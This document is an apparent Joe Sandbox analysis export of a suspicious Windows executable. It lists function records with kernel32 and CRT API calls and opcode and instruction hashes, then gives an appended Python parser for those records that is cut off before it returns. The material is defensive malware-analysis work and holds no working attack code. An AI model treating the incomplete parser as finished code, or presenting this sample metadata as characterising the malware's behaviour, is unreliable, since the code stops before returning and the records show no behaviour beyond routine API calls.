                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0078CDE1
                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0078CEC7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CatchEncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 1435073870-2084237596
                                                                                                        • Opcode ID: 095cd29fb7aff4aee2d58c5160fdc7985bde91d657e6777725c6a98398ed7d25
                                                                                                        • Instruction ID: ef3cc65169612a72b7bf9fbdba6a78f985ece8b3808abfa70168ceb6e256abd1
                                                                                                        • Opcode Fuzzy Hash: 095cd29fb7aff4aee2d58c5160fdc7985bde91d657e6777725c6a98398ed7d25
                                                                                                        • Instruction Fuzzy Hash: F0412871940209EFCF16EF98CC85AEEBBB5FF48304F198199FA04A6251D3399960DB61
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3213747228-0
                                                                                                        • Opcode ID: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                        • Instruction ID: 82978acf03d5e63d0b0e43f75dd919ea129f22a97805d0253cf5ed45729239c8
                                                                                                        • Opcode Fuzzy Hash: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                        • Instruction Fuzzy Hash: A8B13732A042459FDF15CF28E851BBEBBF5EF56350F2441AAE845AB342DA3C8D41C762
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 4489bc5aed3415c3a9e2860f93546a47855bf6ebbcf75c5d4fef3120f2163d6a
                                                                                                        • Instruction ID: ad9bf08f29feb1586cfd8ffd00b75bca530bd2286b2896f9fc606d53304c8a54
                                                                                                        • Opcode Fuzzy Hash: 4489bc5aed3415c3a9e2860f93546a47855bf6ebbcf75c5d4fef3120f2163d6a
                                                                                                        • Instruction Fuzzy Hash: B751BE72AC4702EFEB2ABF54D945B6A73A4FF14710F14402EE80297691D73DAC41DBA1
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,?,3F07E9DB,00000000), ref: 00769A99
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769B00
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00769B07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcVersion
                                                                                                        • String ID:
                                                                                                        • API String ID: 3310240892-0
                                                                                                        • Opcode ID: 9d7e25c5f6439608a63c955ff7f738e6ba5206625fd97a3337a246d45ccc199b
                                                                                                        • Instruction ID: dab33346dfb225156fe7e081853cc948208d0dab05f0b1cc7afc97b0fd12498a
                                                                                                        • Opcode Fuzzy Hash: 9d7e25c5f6439608a63c955ff7f738e6ba5206625fd97a3337a246d45ccc199b
                                                                                                        • Instruction Fuzzy Hash: 50512B71D04208DBDB14EB78DD497DDBB79EB45310F504299E90AA72C1EB3D9E80CB91
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A6CFE
                                                                                                        • _free.LIBCMT ref: 007A6D27
                                                                                                        • SetEndOfFile.KERNEL32(00000000,007A348F,00000000,?,?,?,?,?,?,?,?,007A348F,?,00000000), ref: 007A6D59
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,007A348F,?,00000000,?,?,?,?,?), ref: 007A6D75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1547350101-0
                                                                                                        • Opcode ID: 9dc92905a490e4100e67d9355b07492e076c2b5f54b87505a66ab4f6bca87b4f
                                                                                                        • Instruction ID: 289c1d45ea2bf0e87337591a2321f563d1f870c8f6776950fdaadb89e6cfdf77
                                                                                                        • Opcode Fuzzy Hash: 9dc92905a490e4100e67d9355b07492e076c2b5f54b87505a66ab4f6bca87b4f
                                                                                                        • Instruction Fuzzy Hash: 6241D272700604DADF15ABB89C0AB9E3775EF863A0F2D0710F554E72A2EA3CD9408771
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Similarity
• API ID: Mtx_unlock$Cnd_broadcastCurrentThread
• String ID:
• API String ID: 3264154886-0
• Opcode ID: d191e9b176bfe1972c21ef33569816b8c0fd28f58e9011fe268dab5ded11e1ec
• Instruction ID: 63f15b104700c432b5409369991225306d9d70e7eb6e2b05916986ecda3a369b
• Opcode Fuzzy Hash: d191e9b176bfe1972c21ef33569816b8c0fd28f58e9011fe268dab5ded11e1ec
• Instruction Fuzzy Hash: 6A41DFB1A01605DFCB11EF64C844B9AB7E8FF18320F144529E81AC7781EB39EA05CBD1
APIs
  • Part of subcall function 0078E64B: _free.LIBCMT ref: 0078E659
  • Part of subcall function 0079DEFF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,00797B47,0000FDE9,8B18EC83,?,?,?,007978C0,0000FDE9,00000000,?), ref: 0079DFAB
• GetLastError.KERNEL32 ref: 0079EABD
• __dosmaperr.LIBCMT ref: 0079EAC4
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0079EB03
• __dosmaperr.LIBCMT ref: 0079EB0A
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
• Opcode ID: c89133209f3e2d45ed95b386c4b29fbd7958e95cd134d081907af5303038fe60
• Instruction ID: ea6190b867cd25130f5403e00e7f97f49de1d7791a2a12b0d1ff0aacad8c5d71
• Opcode Fuzzy Hash: c89133209f3e2d45ed95b386c4b29fbd7958e95cd134d081907af5303038fe60
• Instruction Fuzzy Hash: 6521B3B1600205EFDF20EF65AC85D7BB7ADFF113647108628F91997261E738EC4087A0
APIs
• GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
• _free.LIBCMT ref: 00796882
• _free.LIBCMT ref: 007968B8
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 4bd6d526b4d1ab3cfad8e75d4fc8b07d8d7986ce7b6d109a9dddf4a1e93a2df5
• Instruction ID: 936ceb1daad75504602ea5217b468a87a7f454ddcade68d63b79e03163376fc8
• Opcode Fuzzy Hash: 4bd6d526b4d1ab3cfad8e75d4fc8b07d8d7986ce7b6d109a9dddf4a1e93a2df5
• Instruction Fuzzy Hash: 7A11E5B2204600AFDF5137B4BCC9E2F279EEBC17767240339F120961E2DE6E8C468225
APIs
  • Part of subcall function 00787CB9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00787D0B,00000014,?,00787D4C,00000014,?,00762D32,00000000,00000014,00000000,3F07E9DB), ref: 00787CC5
• __Mtx_unlock.LIBCPMT ref: 00787D9E
• FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,3F07E9DB,?,?,?,Function_00048330,000000FF), ref: 00787DC6
• __Mtx_unlock.LIBCPMT ref: 00787E01
• __Cnd_broadcast.LIBCPMT ref: 00787E12
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
• String ID:
• API String ID: 420990631-0
• Opcode ID: afce54a0b36a22663e5370f04e59bb83d0d330dbe1154648dd1a47c8b17c3180
• Instruction ID: c5e118aa56cdb933bcd0adae61c965c92e071093c49cad5e2600c8f6feb63439
• Opcode Fuzzy Hash: afce54a0b36a22663e5370f04e59bb83d0d330dbe1154648dd1a47c8b17c3180
• Instruction Fuzzy Hash: 3E118172988600EBCA597B659C0AF2F7768EB55B20B20441EF80693252DF3DD801CBB5
APIs
• GetLastError.KERNEL32(007808E7,007808E7,8B18EC83,00790C77,00797E78,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 0079697C
• _free.LIBCMT ref: 007969D9
• _free.LIBCMT ref: 00796A0F
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84,74DF0F00), ref: 00796A1A
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 1f5f06e98b408f0dc861c6fb521bd65dd68a5e8fad93bfab3817e1e8ccd85b2f
• Instruction ID: 29e0402518d16c4ecadad9fddd4de76dc9cc205a5ae52d9afda483689b671e37
• Opcode Fuzzy Hash: 1f5f06e98b408f0dc861c6fb521bd65dd68a5e8fad93bfab3817e1e8ccd85b2f
• Instruction Fuzzy Hash: AB1108B2204600ABDF517778BC89E2F269DEBC2776721432DF124921E2ED7E9C428165
APIs
• GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,007A5439,?,?,?,00000020,00000001), ref: 00799905
• GetLastError.KERNEL32(?,007A5439,?,?,?,00000020,00000001), ref: 0079990F
• __dosmaperr.LIBCMT ref: 00799916
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: b18fb24bcaf24490329569a54250974807bb25a2c171cddb160d3b9b3086dddc
• Instruction ID: 5a54ac94aff599c9d0791d78052efc7a865a535f71899b1724b7b22afd9bed2f
• Opcode Fuzzy Hash: b18fb24bcaf24490329569a54250974807bb25a2c171cddb160d3b9b3086dddc
• Instruction Fuzzy Hash: 52F01231600119BB9F211B6AEC08E5BBF69FF853B03048519F61DD6120D739E851DBD0
APIs
• GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,007A53C4,?,?,?,?,00000020,00000001), ref: 0079996E
• GetLastError.KERNEL32(?,007A53C4,?,?,?,?,00000020,00000001), ref: 00799978
• __dosmaperr.LIBCMT ref: 0079997F
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorFullLastNamePath__dosmaperr
• String ID:
• API String ID: 2398240785-0
• Opcode ID: fde96dfbf9198a6baae910c891c5751334dad02618c2009026cb4509bc1374b1
• Instruction ID: 42c1cd047a8548970abe376d3594ac483c8fffd0085296aee35a475a33209aa7
• Opcode Fuzzy Hash: fde96dfbf9198a6baae910c891c5751334dad02618c2009026cb4509bc1374b1
• Instruction Fuzzy Hash: F2F01231600115BB9F205BAAEC08D9BFF69FF853B03058519B61DD6120D739E851DBE0
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000), ref: 007A6FB1
• GetLastError.KERNEL32(?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?,00000000,?,00797AE2,8B18EC83), ref: 007A6FBD
  • Part of subcall function 007A6F83: CloseHandle.KERNEL32(FFFFFFFE,007A6FCD,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?,00000000), ref: 007A6F93
• ___initconout.LIBCMT ref: 007A6FCD
  • Part of subcall function 007A6F45: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007A6F74,007A3A71,00000000,?,00797596,?,?,00000000,?), ref: 007A6F58
• WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,007A3A84,00000000,00000001,00000000,00000000,?,00797596,?,?,00000000,?), ref: 007A6FE2
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: 5b2949f7ad69e05f1846d0264dbf3f70942e67c72f520dac4f192d859d6ff658
• Instruction ID: e7e8d11081ea0c811a54b89aff07fb21020958097ced15a0f055c9e4994e7919
• Opcode Fuzzy Hash: 5b2949f7ad69e05f1846d0264dbf3f70942e67c72f520dac4f192d859d6ff658
• Instruction Fuzzy Hash: C2F0A53A510219BFCF622FD5EC1CE9A3F26FF497A1B088254FA1895530D63A9860DB94
APIs
• SleepConditionVariableCS.KERNEL32(?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078987D
• LeaveCriticalSection.KERNEL32(007C7FA8,007CBDC0,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789887
• WaitForSingleObjectEx.KERNEL32(007CBDC0,00000000,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789898
• EnterCriticalSection.KERNEL32(007C7FA8,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078989F
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3269011525-0
                                                                                                        • Opcode ID: 583b0d73c68cd96d9d5c3ce1373da333d47f33d7ee145ebf4dce483e0d0cf8ce
                                                                                                        • Instruction ID: 8bea7290421a0b714ba7cd91dc7dff55e5ca41ab4532b633c62cb1c2f46d317b
                                                                                                        • Opcode Fuzzy Hash: 583b0d73c68cd96d9d5c3ce1373da333d47f33d7ee145ebf4dce483e0d0cf8ce
                                                                                                        • Instruction Fuzzy Hash: A3E09231A89128AFCA0A2B45EC48F9E3F14BF05722B04812CF60966160CE7D1812CFD8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
• API String ID: 0-1978484262
• Opcode ID: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
• Instruction ID: 2f657a6d0c2f8ce7be272932ca4034a1cf55a35df5b122c873ed1aec7ca77c87
• Opcode Fuzzy Hash: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
• Instruction Fuzzy Hash: 4E415FB1A00214FFDF219F99A886DAEBBB8EB85310B10406AF504E7351DA799B40CB91
APIs
  • Part of subcall function 0079F35F: GetOEMCP.KERNEL32(00000000,0079F5D0,0079721B,00000000,8B18EC83,8B18EC83,00000000,?,0079721B), ref: 0079F38A
• _free.LIBCMT ref: 0079F62D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free
• String ID: hV|
• API String ID: 269201875-215450703
• Opcode ID: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
• Instruction ID: fa81f7552a7d0e762bd0a90a602b9fd185891210681311f2a7239139ec9a15f2
• Opcode Fuzzy Hash: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
• Instruction Fuzzy Hash: 8131B071900209AFCF01DF68E844EDE77B4EF45324F10416AF910DB2A1EB7A9D51CB60
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 007644EB
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0076453A
  • Part of subcall function 0078863E: _Yarn.LIBCPMT ref: 0078865D
  • Part of subcall function 0078863E: _Yarn.LIBCPMT ref: 00788681
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name
• API String ID: 1908188788-1405518554
• Opcode ID: f01502ee5abce357050af823c1b2de2e0fb788ebaa216984aadcb3c4a81f78f6
• Instruction ID: df436d9e3bcd22579560ba80f2367a91c94a77f34045141637d491a8b890e6b1
• Opcode Fuzzy Hash: f01502ee5abce357050af823c1b2de2e0fb788ebaa216984aadcb3c4a81f78f6
• Instruction Fuzzy Hash: 83119171904B84DFD320CF69C905B57BBF4EB19710F004A1EE49AC7B81D7B9A5048B95
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free
• String ID: ?{
• API String ID: 269201875-2067273236
• Opcode ID: 0f48a75bd119926560d3cb0b909fe7935817393fb4e93b3deacc08690bbf6985
• Instruction ID: c4f19ea03b90e35f166402b01894b77dc781f925a3765eec68a91e55e1c94663
• Opcode Fuzzy Hash: 0f48a75bd119926560d3cb0b909fe7935817393fb4e93b3deacc08690bbf6985
• Instruction Fuzzy Hash: BFF0A93340D210AEEB256A616C46F9B7759EBC3771F14053AF90C6A142DA69584286F1
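Every function record in this listing has the same layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, then the opcode and instruction hashes), which makes the export easy to query in bulk: which records call a given API, which reference the sample path, and whether Opcode ID and Opcode Fuzzy Hash agree (they are identical in every record above). The parser below is an added example written by the editor; it is not Joe Sandbox code and the dict keys are simply the report's own field labels. SAMPLE is a constructed excerpt in the same layout with values copied from the records above, with the "Download File" link text deliberately left on one Associated line to show it being stripped.

```python
"""Parse Joe Sandbox per-function records (the repeating APIs / Strings /
Memory Dump Source / Joe Sandbox IDA Plugin / Similarity blocks) into dicts
so a whole function listing can be queried. Editor-added example."""
import re

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
KEEP_KEYS = {"Snapshot File", "API ID", "String ID", "API String ID", "Opcode ID",
             "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
LAST_KEY = "Instruction Fuzzy Hash"   # final bullet of every record
LINK_TEXT = "Download File"           # web-page link residue to drop
# "Name.Module(args), ref: ADDR"  or, without arguments,  "Name.Module ref: ADDR"
API_RE = re.compile(r"^(?P<name>[\w:~]+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.*)$")

# Constructed excerpt in the report's layout; values copied from the records above.
SAMPLE = """\
APIs
• SleepConditionVariableCS.KERNEL32(?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078987D
• LeaveCriticalSection.KERNEL32(007C7FA8,007CBDC0,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789887
• WaitForSingleObjectEx.KERNEL32(007CBDC0,00000000,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 00789898
• EnterCriticalSection.KERNEL32(007C7FA8,?,007897F7,00000064,?,00768A41,007CBDC0), ref: 0078989F
Memory Dump Source
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
Similarity
• API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
• String ID:
• Opcode ID: 583b0d73c68cd96d9d5c3ce1373da333d47f33d7ee145ebf4dce483e0d0cf8ce
• Instruction Fuzzy Hash: A3E09231A89128AFCA0A2B45EC48F9E3F14BF05722B04812CF60966160CE7D1812CFD8
Strings
Similarity
• String ID: C:\\Users\\user\\Desktop\\5Z1WFRMTOXRH6X21Z8NU8.exe
• Opcode ID: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
• Opcode Fuzzy Hash: c0026cb2cfb420a72ef019d1bc97b10a43a57699c210ca46dfa09b8e48c96523
• Instruction Fuzzy Hash: 4E415FB1A00214FFDF219F99A886DAEBBB8EB85310B10406AF504E7351DA799B40CB91
APIs
  • Part of subcall function 0079F35F: GetOEMCP.KERNEL32(00000000,0079F5D0,0079721B,00000000,8B18EC83,8B18EC83,00000000,?,0079721B), ref: 0079F38A
• _free.LIBCMT ref: 0079F62D
Similarity
• API ID: _free
• Opcode ID: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
• Opcode Fuzzy Hash: 7b65d4f313b589f820c6d96058abc860b2fd4c9bdd31e813b424d6eab853725b
• Instruction Fuzzy Hash: 8131B071900209AFCF01DF68E844EDE77B4EF45324F10416AF910DB2A1EB7A9D51CB60
"""


def _parse_api(text, subcall_of=None):
    m = API_RE.match(text)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16),
            "subcall_of": int(subcall_of, 16) if subcall_of else None}


def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:           # section label; may have no bullets
            section, rec = line, rec or {"apis": [], "associated_dumps": []}
            continue
        if not line.startswith("•"):          # blank line or page chrome
            continue
        rec = rec or {"apis": [], "associated_dumps": []}
        item = line[1:].strip()
        sub = SUBCALL_RE.match(item)          # indented "Part of subcall" bullet
        subcall_of, item = (sub.group("func"), sub.group("rest")) if sub else (None, item)
        if section == "APIs":
            api = _parse_api(item, subcall_of)
            if api:
                rec["apis"].append(api)
            continue
        key, _, value = item.partition(":")   # first colon only: values contain colons
        key, value = key.strip(), value.strip()
        if value.endswith(LINK_TEXT):
            value = value[:-len(LINK_TEXT)].strip()
        if key == "Associated":
            rec["associated_dumps"].append(value)
        elif key in KEEP_KEYS or key == "Source File":
            rec[key] = value
        if key == LAST_KEY:                   # last field: record complete
            records.append(rec)
            rec, section = None, None
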